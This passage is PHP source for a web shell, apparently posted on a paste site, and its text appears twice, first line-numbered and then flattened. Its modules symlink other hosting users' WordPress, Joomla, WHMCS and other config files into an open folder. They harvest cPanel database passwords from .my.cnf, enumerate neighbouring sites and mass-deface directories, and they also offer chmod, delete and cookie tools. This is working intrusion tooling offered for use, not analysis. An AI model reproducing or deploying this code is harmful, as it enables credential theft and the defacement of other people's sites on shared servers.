  1384.         <input type='text' name='text' style='width:100%'>
  1385. </td><tr>
  1386. <td style='width:20%'>Hash :</td><td style='width:80%'><select name='id' style='width:100%'>
  1387. <option value='1'>Md5</option>
  1388. <option value='2'>Crc32</option>
  1389. <option value='3'>Sha1</option>
  1390. <option value='4'>All</option>
  1391. </select></td><tr><td style='width:20%'></td><td style='width:80%'>
  1392.         <input type='submit' value='Create' name='encrypt' class='btn-exe' style='width:100px'></td></table></form></div>");
  1393. }
  1394.  
  1395.  
  1396. // --- Multi Symlink --- //
  1397. elseif($_COEG['command'] == 'symlink') {
  1398. echo '<div class="coL-panel"><table>
  1399. <td class="td-panel"><i class="fa fa-bug"></i></td><td class="td-panel-right">MULTI SYMLINK</td></table></div>';
  1400. if(is_readable("/etc/named.conf")) {
  1401.         $named = '<a href="?symlink=named.conf&dir='.$dir.'">OPEN</a>';
  1402.         } else {
  1403.         $named = '<font color="red">DISABLED</font>';
  1404. }
  1405. if(is_readable("/etc/valiases")) {
  1406.         $valiases = '<a href="?symlink=valiases&dir='.$dir.'">OPEN</a>';
  1407.         } else {
  1408.         $valiases = '<font color="red">DISABLED</font>';
  1409. }
  1410. if(is_readable("/etc/passwd")){
  1411.         $passwd = '<a href="?symlink=passwd&dir='.$dir.'">OPEN</a>';
  1412.         } else {
  1413.         $passwd = '<font color="red">DISABLED</font>';
  1414.         }
  1415. if(is_readable("/var/named")){
  1416.         $var = '<a href="?symlink=var&dir='.$dir.'">OPEN</a>';
  1417.         } else {
  1418.         $var = '<font color="red">DISABLED</font>';
  1419.         }  
  1420. echo '<table class="table-info">';
  1421.         echo '<th class="th-info">From</th>';
  1422.         echo '<th class="th-info">Arrow</th>';
  1423.         echo '<th class="th-info">Action</th>';
  1424.         echo '<tr>';
  1425.         echo '<td class="td-info"><span class="label-default">+</span> [ /etc/named.conf ]</td><td class="td-info"><center>&raquo;</center></td><td class="td-info"><center>'.$named.'</a></center></td>';
  1426.         echo '<tr>';
  1427.         echo '<td class="td-info"><span class="label-default">+</span> [ /etc/valiases ]</td><td class="td-info""><center>&raquo;</center></td><td class="td-info"><center>'.$valiases.'</a></center></td>';
  1428.         echo '<tr>';
  1429.         echo '<td class="td-info"><span class="label-default">+</span> [ /etc/passwd ]</td><td class="td-info"><center>&raquo;</center></td><td class="td-info"><center>'.$passwd.'</a></center></td>';
  1430.         echo '<tr>';
  1431.         echo '<td class="td-info"><span class="label-default">+</span> [ /var/named/ ]</td><td class="td-info"><center>&raquo;</center></td><td class="td-info"><center>'.$var.'</a></center></td>';
  1432.         echo '</table>';
  1433. @mkdir('pee',0777);
  1434. @symlink("/","pee/root");
  1435. $htaccss = "Options all
  1436. DirectoryIndex Sux.html
  1437. AddType text/plain .php
  1438. AddHandler server-parsed .php
  1439. AddType text/plain .html
  1440. AddHandler txt .html
  1441. Require None
  1442. Satisfy Any";
  1443. file_put_contents("pee/.htaccess",$htaccss);
  1444. $ms_2 = file_get_contents("/etc/passwd");
  1445. $ms_2z = explode("\n",$ms_2);
  1446.        
  1447.         foreach($ms_2z as $ms_3){
  1448. $ms_1 = explode(":",$ms_3);
  1449. error_reporting(0);
  1450.  
  1451. $ms_4 = posix_getcwd();
  1452. $dr = explode("/",$ms_4);
  1453.  
  1454. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/wp-config.php',"pee/".$ms_1[0].'-WordPress.txt');
  1455. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/blog/wp-config.php',"pee/".$ms_1[0].'-WordPress.txt');
  1456. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/wp/wp-config.php',"pee/".$ms_1[0].'-WordPress.txt');
  1457. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/site/wp-config.php',"pee/".$ms_1[0].'-WordPress.txt');
  1458. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/config.php',"pee/".$ms_1[0].'-PhpBB.txt');
  1459. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/includes/config.php',"pee/".$ms_1[0].'-vBulletin.txt');
  1460. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/configuration.php',"pee/".$ms_1[0].'-Joomla.txt');
  1461. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/web/configuration.php',"pee/".$ms_1[0].'-Joomla.txt');
  1462. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/joomla/configuration.php',"pee/".$ms_1[0].'-Joomla.txt');
  1463. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/site/configuration.php',"pee/".$ms_1[0].'-Joomla.txt');
  1464. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/conf_global.php',"pee/".$ms_1[0].'-IPB.txt');
  1465. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/inc/config.php',"pee/".$ms_1[0].'-MyBB.txt');
  1466. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/Settings.php',"pee/".$ms_1[0].'-SMF.txt');
  1467. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/sites/default/settings.php',"pee/".$ms_1[0].'-Drupal.txt');
  1468. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/e107_config.php',"pee/".$ms_1[0].'-e107.txt');
  1469. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/datas/config.php',"pee/".$ms_1[0].'-Seditio.txt');
  1470. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/includes/configure.php',"pee/".$ms_1[0].'-osCommerce.txt');
  1471. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/client/configuration.php',"pee/".$ms_1[0].'-WHMCS.txt');
  1472. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/clientes/configuration.php',"pee/".$ms_1[0].'-WHMCS.txt');
  1473. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/support/configuration.php',"pee/".$ms_1[0].'-WHMCS.txt');
  1474. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/supportes/configuration.php',"pee/".$ms_1[0].'-WHMCS.txt');
  1475. symlink('/'.$dr[1].'/'.$m




"; } else { echo "
"; } } // --- Rename File --- // elseif($_COEG['command'] == 'rename') { if($_COEG['rename']) { $rename = rename($_COEG['file'], "$dir/".htmlspecialchars($_COEG['rename']).""); if($rename) { success('File Renamed !!'); mtr("?".x7."rename&".x5.$dir."&".x6.$dir."/".$_COEG["rename"]); } else { error('Permission Denied !!'); } } echo '
RENAME FILE
'; echo '
[ '.basename($_COEG['file']).' ]'.$size.'

'; echo "
"; echo "





"; echo "
"; } // --- Chmod File --- // else if($_COEG['command'] == 'chmod') { if(isset($_COEG['perm'])) { if(chmod($_COEG['file'],octdec($_COEG['perm']))) { success('Chmod Ok !!'); mtr("?".x7."chmod&".x5.$dir."&".x6.$_COEG['file']); } else { error('Permission Denied !!'); } } echo '
CHMOD FILE
'; echo '
[ '.basename($_COEG['file']).' ]'.$size.'

'; echo "
"; echo "





"; echo "
"; } // --- Delete File --- // elseif($_COEG['command'] == 'delete') { $delete = unlink($_COEG['file']); if($delete) { vars(''); } else { error('Permission Denied !!'); } } // --- Jumping Server --- // elseif($_COEG['command'] == 'jumping') { echo '
JUMPING SERVER
'; $i = 0; $s_a = fopen("/etc/passwd", "r"); while($s_b = fgets($s_a)) { if($s_b == '' || !$s_a) { error("Can't Read [ /etc/passwd ]"); mtr("?".x5.$dir); echo x9; } else { preg_match_all('/(.*?):x:/', $s_b, $s_c); foreach($s_c[1] as $s_d) { $s_e = "/home/$s_d/public_html"; if(is_readable($s_e)) { $i++; $s_o = ""; if(is_writable($s_e)) { $s_o = "
[ $s_d ]
"; } echo $s_o; $s_k = file_get_contents("/etc/named.conf"); if($s_k == '') { success('Server Not Found !!'); mtr("?".x5.$dir); echo x9; } else { preg_match_all("#/var/named/(.*?).db#", $s_k, $s_v); foreach($s_v[1] as $s_x) { $s_g = posix_getpwuid(@fileowner("/etc/valiases/$s_x")); $s_g = $s_g['name']; if($s_g == $s_d) { echo "
[ $s_d ]http://$s_x
"; break;}}}}}}} if($i == 0) { error('Server Not Found !!'); mtr("?".x5.$dir); echo x9; } else { echo "
Total : ".$i."
"; } } // --- Config Grabber --- // elseif($_COEG['command'] == 'config') { $s_t = fopen("/etc/passwd", "r"); $s_z = mkdir("bug-config", 0777); $s_s = "Options all\ Require None\ Satisfy Any"; $s_d = fopen("bug-config/.htaccess","w"); fwrite($s_d, $s_s); while($s_q = fgets($s_t)) { if($s_q == "" || !$s_t) { error('Can\'t Read etc/passwd !!'); } else { preg_match_all('/(.*?):x:/', $s_q, $s_y); foreach($s_y[1] as $s_p) { $s_k = "/home/$s_p/public_html/"; if(is_readable($s_k)) { $s_g = array( "/home/$s_p/.my.cnf" => "cpanel", "/home/$s_p/.accesshash" => "WHM-accesshash", "/home/$s_p/public_html/bw-configs/config.ini" => "BosWeb", "/home/$s_p/public_html/config/koneksi.php" => "Lokomedia", "/home/$s_p/public_html/lokomedia/config/koneksi.php" => "Lokomedia", "/home/$s_p/public_html/clientarea/configuration.php" => "WHMCS", "/home/$s_p/public_html/whm/configuration.php" => "WHMCS", "/home/$s_p/public_html/whmcs/configuration.php" => "WHMCS", "/home/$s_p/public_html/forum/config.php" => "phpBB", "/home/$s_p/public_html/sites/default/settings.php" => "Drupal", "/home/$s_p/public_html/config/settings.inc.php" => "PrestaShop", "/home/$s_p/public_html/app/etc/local.xml" => "Magento", "/home/$s_p/public_html/joomla/configuration.php" => "Joomla", "/home/$s_p/public_html/configuration.php" => "Joomla", "/home/$s_p/public_html/wp/wp-config.php" => "WordPress", "/home/$s_p/public_html/wordpress/wp-config.php" => "WordPress", "/home/$s_p/public_html/wp-config.php" => "WordPress", "/home/$s_p/public_html/admin/config.php" => "OpenCart", "/home/$s_p/public_html/slconfig.php" => "Sitelok", "/home/$s_p/public_html/application/config/database.php" => "Ellislab"); foreach($s_g as $s_h => $s_l) { $s_r = file_get_contents($s_h); if($s_r == '') { } else { $fcS = fopen("bug-config/$s_p-$s_l.txt","w"); fputs($fcS,$s_r); }}}}}} success('OK !!'); vars(""); } // --- Cookies Manager --- // elseif($_COEG['command'] == 'cookie') { vars('
COOKIES MANAGER
'); vars(""); vars(""); if(count($_COOKIE) != 0) { foreach($_COOKIE as $c1 => $c2) { echo ""; } vars("
Name
Value
".$c1."
".$c2."
"); } vars('
'); vars("
Cookies Found : [ ".count($_COOKIE)." ]
"); if(isset($_POST['c3'])) { if(setcookie($_POST['c3'],$_POST['c2'])) { success('Cookie Created !!'); mtr('?'.x7.'cookie&'.x5.$dir); } else { error('Permission Denied !!'); } } echo '
'; } // --- cpanel finder --- // elseif($_COEG['command'] == 'cpanel') { echo '
CPANEL FINDER
'; @ini_set('display_errors',0); function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){ $ar0=explode($marqueurDebutLien, $text); $ar1=explode($marqueurFinLien, $ar0[$i]); return trim($ar1[0]); } $d0mains = @file('/etc/named.conf'); $domains = scandir("/var/named"); if ($domains or $d0mains) { $domains = scandir("/var/named"); if($domains) { echo ""; $count=1; $dc = 0; $list = scandir("/var/named"); foreach($list as $domain){ if(strpos($domain,".db")){ $domain = str_replace('.db','',$domain); $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain)); $dirz = '/home/'.$owner['name'].'/.my.cnf'; $path = getcwd(); if (is_readable($dirz)) { copy($dirz, ''.$path.'/'.$owner['name'].'.txt'); $p=file_get_contents(''.$path.'/'.$owner['name'].'.txt'); $password=entre2v2($p,'password="','"'); echo ""; $dc++; }}} echo '
Domain
Result
".$domain." OPEN
'; $total = $dc; echo '
Total Cpanel : '.$total.'
'; }else{ $d0mains = @file('/etc/named.conf'); if($d0mains) { echo ""; $count=1; $dc = 0; $mck = array(); foreach($d0mains as $d0main){ if(@eregi('zone',$d0main)){ preg_match_all('#zone "(.*)"#',$d0main,$domain); flush(); if(strlen(trim($domain[1][0])) >2){ $mck[] = $domain[1][0]; } } } $mck = array_unique($mck); $usr = array(); $dmn = array(); foreach($mck as $o) { $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o)); $usr[] = $infos['name']; $dmn[] = $o; } array_multisort($usr,$dmn); $dt = file('/etc/passwd'); $passwd = array(); foreach($dt as $d) { $r = explode(':',$d); if(strpos($r[5],'home')) { $passwd[$r[0]] = $r[5]; } } $l=0; $j=1; foreach($usr as $r) { $dirz = '/home/'.$r.'/.my.cnf'; $path = getcwd(); if (is_readable($dirz)) { copy($dirz, $path.'/'.$r.'.txt'); $p=file_get_contents($path.'/'.$r.'.txt'); $password=entre2v2($p,'password="','"'); echo ""; $dc++; flush(); $l=$l?0:1; $j++; } } } echo '
Domain
Result
".$dmn[$j-1]." OPEN
'; $total = $dc; echo '
Total Cpanel : '.$total.'
'; } } else{ error('Access Disabled !!'); mtr('?'.x5.$dir); echo x9; } } // --- Mass Deface --- // elseif($_COEG['command'] == 'massdef') { echo '
MASS DEFACE
'; echo '
'; echo "
"; echo ""; echo "
Root :
File :
"; echo "
Source :

"; echo "
"; if (isset ($_COEG['base_dir'])) { if (!file_exists ($_COEG['base_dir'])) { $alert = "Destination Not Found !"; failed1($alert); } @chdir ($_COEG['base_dir']) or die (""); $files = @scandir ($_COEG['base_dir']) or die ("Oh Shit !!
"); foreach ($files as $file): if ($file != "." && $file != ".." && @filetype ($file) == "dir") { $index = getcwd ()."/".$file."/".$_COEG['file_name']; if (file_put_contents ($index, $_COEG['index'])) echo "
+ $index
"; } endforeach; } } // --- Multi Hash --- // elseif($_COEG['command'] == 'multihash') { vars('
MULTI HASH
'); if($_COEG['encrypt']) { switch($_COEG['id']) { case '1': if(md5($_COEG['text'])) { vars("
+ Text : ".$_COEG['text']."
+ Md5 : ".md5($_COEG['text'])."
"); } else { error('Permission Denied !!'); } break; case '2': if(crc32($_COEG['text'])) { vars("
+ Text : ".$_COEG['text']."
+ Crc32 : ".crc32($_COEG['text'])."
"); } else { error('Permission Denied !!'); } break; case '3': if(sha1($_COEG['text'])) { vars("
+ Text : ".$_COEG['text']."
+ Sha1 : ".sha1($_COEG['text'])."
"); } else { error('Permission Denied !!'); } break; case '4': vars("
+ Text : ".$_COEG['text']."
+ Md5 : ".md5($_COEG['text'])."
+ Crc32 : ".crc32($_COEG['text'])."
+ Sha1 : ".sha1($_COEG['text'])."
"); break; } } vars("
Text :
Hash :
"); } // --- Multi Symlink --- // elseif($_COEG['command'] == 'symlink') { echo '
MULTI SYMLINK
'; if(is_readable("/etc/named.conf")) { $named = 'OPEN'; } else { $named = 'DISABLED'; } if(is_readable("/etc/valiases")) { $valiases = 'OPEN'; } else { $valiases = 'DISABLED'; } if(is_readable("/etc/passwd")){ $passwd = 'OPEN'; } else { $passwd = 'DISABLED'; } if(is_readable("/var/named")){ $var = 'OPEN'; } else { $var = 'DISABLED'; } echo ''; echo ''; echo ''; echo ''; echo ''; echo ''; echo ''; echo ''; echo ''; echo ''; echo ''; echo ''; echo '
FromArrowAction
+ [ /etc/named.conf ]
»
'.$named.'
+ [ /etc/valiases ]
»
'.$valiases.'
+ [ /etc/passwd ]
»
'.$passwd.'
+ [ /var/named/ ]
»
'.$var.'
'; @mkdir('pee',0777); @symlink("/","pee/root"); $htaccss = "Options all DirectoryIndex Sux.html AddType text/plain .php AddHandler server-parsed .php AddType text/plain .html AddHandler txt .html Require None Satisfy Any"; file_put_contents("pee/.htaccess",$htaccss); $ms_2 = file_get_contents("/etc/passwd"); $ms_2z = explode("\n",$ms_2); foreach($ms_2z as $ms_3){ $ms_1 = explode(":",$ms_3); error_reporting(0); $ms_4 = posix_getcwd(); $dr = explode("/",$ms_4); symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/wp-config.php',"pee/".$ms_1[0].'-WordPress.txt'); symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/blog/wp-config.php',"pee/".$ms_1[0].'-WordPress.txt'); symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/wp/wp-config.php',"pee/".$ms_1[0].'-WordPress.txt'); symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/site/wp-config.php',"pee/".$ms_1[0].'-WordPress.txt'); symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/config.php',"pee/".$ms_1[0].'-PhpBB.txt'); symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/includes/config.php',"pee/".$ms_1[0].'-vBulletin.txt'); symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/configuration.php',"pee/".$ms_1[0].'-Joomla.txt'); symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/web/configuration.php',"pee/".$ms_1[0].'-Joomla.txt'); symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/joomla/configuration.php',"pee/".$ms_1[0].'-Joomla.txt'); symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/site/configuration.php',"pee/".$ms_1[0].'-Joomla.txt'); symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/conf_global.php',"pee/".$ms_1[0].'-IPB.txt'); symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/inc/config.php',"pee/".$ms_1[0].'-MyBB.txt'); symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/Settings.php',"pee/".$ms_1[0].'-SMF.txt'); symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/sites/default/settings.php',"pee/".$ms_1[0].'-Drupal.txt'); symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/e107_config.php',"pee/".$ms_1[0].'-e107.txt'); symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/datas/config.php',"pee/".$ms_1[0].'-Seditio.txt'); symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/includes/configure.php',"pee/".$ms_1[0].'-osCommerce.txt'); symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/client/configuration.php',"pee/".$ms_1[0].'-WHMCS.txt'); symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/clientes/configuration.php',"pee/".$ms_1[0].'-WHMCS.txt'); symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/support/configuration.php',"pee/".$ms_1[0].'-WHMCS.txt'); symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/supportes/configuration.php',"pee/".$ms_1[0].'-WHMCS.txt'); symlink('/'.$dr[1].'/'.$m
  • Recent Pastes